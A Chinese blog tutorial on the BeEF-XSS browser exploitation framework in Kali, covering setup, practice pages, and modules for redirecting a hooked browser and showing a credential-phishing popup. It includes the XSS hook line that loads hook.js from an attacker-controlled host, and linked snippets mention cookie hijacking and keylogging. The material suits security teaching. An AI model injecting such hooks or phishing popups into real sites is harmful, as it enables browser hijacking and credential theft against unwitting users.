Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip

最新推荐文章于 2024-08-20 18:00:00 发布
最新推荐文章于 2024-08-20 18:00:00 发布
阅读量866 收藏 25
点赞数 30
分类专栏: 程序员 文章标签: tcp/ip 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968582/article/details/138936930
版权
Beefxss

Beef-XSS是一款功能强大的
「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。

一、首次使用

在kali中搜索 beefxss,就能找到。

在这里插入图片描述

单击打开,会自动运行「beef-xss 服务」,并打开Web界面。

提示:如果弹出的Web界面提示链接失败,可以关掉终端命令行,重新打开一次beef xss。

在这里插入图片描述

换成kali虚拟机的IP,也可以在物理机上访问Web界面:http://127.0.0.1:3000/ui/panel

在这里插入图片描述

二、修改账号密码

初次使用会让你设置密码,如果密码忘了,可以到 /usr/share/beef-xss/config.yaml 查看,这是Beff-xx的「配置文件」,用来保存版本、密码等配置信息。

在这里插入图片描述

修改密码可以直接修改文件中passwd这个字段,重启beef-xx服务后生效。

# 1、编辑配置文件,修改passwd字段
vim /usr/share/beef-xss/config.yaml
# 2、重启beef-xss服务
systemctl restart beef-xss

三、自带练习页面

Beef-xss自带两个「练习页面」:

  1. http://127.0.0.1:3000/demos/basic.html
  2. http://127.0.0.1:3000/demos/butcher/index.html

复制链接到kali虚拟机即可访问。

如果想在物理机访问,就把链接中的IP改成kali虚拟机的IP。

在这里插入图片描述

四、简单使用

Beef-xss的打开界面中,给我们提供了一个范例,我们在目标网页「提交」这行JS代码,就可以使用工具了。

提交的时候记得把IP改成部署Beff-xss的主机IP。

在这里插入图片描述

我们拿第一个练习页面来举例,提交代码 <script src="http://192.168.31.101:3000/hook.js"></script>

在这里插入图片描述

提交后,Beff-xss的Web界面,会多出一个「在线浏览器」。

在这里插入图片描述

把练习页面关掉,这个IP就会从在线浏览器中消失,进入「离线浏览器」。

在这里插入图片描述

再次打开练习页面,就会重新进入在线浏览器。

这就意味着,提交了XSS的网页,只有打开时,才可以被利用,关掉就不可利用。

五、工具界面介绍

beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。

在这里插入图片描述

  1. Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。
  2. Offline Browsers:离线浏览器
  3. Getting Started:入门指南,官方的一些文档
  4. Logs:日志,记录工具做过哪些操作
  5. Zombies:僵尸,记录可以利用的目标站点
  6. Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
  7. Details:细节,展示目标的IP、版本等信息
  8. Logs:日志,记录目标浏览器做过哪些操作
  9. Commands:指令,工具的核心,不同的指令对应不同的操作
    – Module Tree:模块树,可以使用的模块功能
    – Module Result History:模块使用记录
    – XXX:指令描述,解释这个功能是干什么用的,怎么使用

六、功能演示

beef-XSS的 Commands 栏提供了很多功能,这里拿两个常用的功能给大家演示一下,功能应该如何使用。

以下演示的功能使用beef-XSS自带的练习网页 http://127.0.0.1:3000/demos/basic.html

请先按照四章节,提交XSS代码后,才可以使用功能。

1、网页重定向

Commands 栏搜索 redirect,点击 Redirect Browser 模块,右侧 Redirect URL 中输入要跳转的网址,点右下角 Execute。

在这里插入图片描述

切换到目标页面,会发现它正在跳转或已经跳转到了指定页面。

在这里插入图片描述

2、社工弹窗

Commands 搜索 pretty,选中 Pretty Theft,右侧链接的IP改成部署Beef-xss的主机IP,点击Execute。

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968582
关注
专栏目录
beef-xss软件使用教程
weixin_44717303的博客
05-24 819
beef-xss教程实验环境打开beefxss登录 dvwa难度调到low 实验环境 beef-xss+kali2021 打开beefxss 打开对应的网址并登录 http://192.168.2.157:3000/ui/panel 然后我们回到虚拟机找到hook地址 登录 dvwa难度调到low
Beefxss使用教程图文教程详细)_怎么把beef改成公网ip(1)
2401_84252743的博客
04-26 471
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
Beefxss使用教程图文教程详细
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
BeEF-XSS详细使用教程
热门推荐
星落的博客
05-12 4万+
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 L.
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
key_beef.zip_28335读取io_DSP GPIO BEEF_DSP28335 IO_DSP28335蜂鸣器_按键
09-14
标题中的“key_beef.zip_28335读取io_DSP GPIO BEEF_DSP28335 IO_DSP28335蜂鸣器_按键”表明了这个压缩包内容是关于使用TI公司的TMS320F28335 DSP(数字信号处理器)进行I/O操作,特别是GPIO(通用输入/输出)功能,...
工具的使用 _ BeEF的使用1
08-03
工具的使用 _ BeEF的使用1
Kali中Beef使用教程
weixin_43287317的博客
04-02 5390
Kali中Beef使用教程
kali安装keylogger_Kali Linux启动Beef-Xss漏洞利用框架教程:
weixin_35515918的博客
12-24 380
注:首先将默认浏览器的IP地址设为本机回环代理地址,IP格式:127.0.0.1,Port:8080,勾选Socks5,勾选Remote DNS,设置完成!root@kali:~# cd /user/share/beef-xssroot@kali:~# beef-xss注:开启后自动跳转到Beef登录界面,链接:http://127.0.0.1/3000/ui/authentication,默认用...
Beef-xss
dieman0446的博客
12-19 222
Beef xss beef安装目录:/usr/share/beef-xss UI URL:http://IP:3000/ui/panel Hook:<script src="http://IP:3000/hook.js"></script> 默认测试页面:http://IP:3000/demos/butcher/index.html 转载于:h...
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
最新发布
wangluoanquan111的博客
08-20 999
✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
【渗透测试工具beefXSS渗透测试工具beef如何安装使用?
web15085181368的博客
03-06 675
目录 事情是这样的 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 模块颜色及解释 回顾
24_XSS跨站脚本攻击-学习与测试/Beef工具使用/Beef-xss攻击实战
weixin_54591045的博客
08-05 699
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
利用BeEF执行XSS攻击
m0_70185580的博客
05-31 607
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中,并启动BeEF的hook服务。接下来,需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时,BeEF就会启动并开始执行攻击。
beef-xss安装与使用
Bu2n的博客
12-07 3503
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
beef-xss的部分模块使用
olddocument的博客
01-24 2769
安装beef-xss sudo apt-get install beef-xss 启动 beef-xss 启动后可以在终端看见需要输入的脚本 为kali的ip地址 回到kali可以发现连接上了 online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 Logs 浏览器动作:焦点变化,鼠标单击,信息输入 commands 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1557
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
利用Beef获取目标主机用户名与密码:实战教程
- 配置beef,首先在MSF(Metasploit Framework)控制台上关联beef,通过编辑`config.yaml`文件,启用所需的模块,并指定回调服务器地址为Kali主机的IP地址(192.168.1.2)。 2. **利用beef获取shell**: - 启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值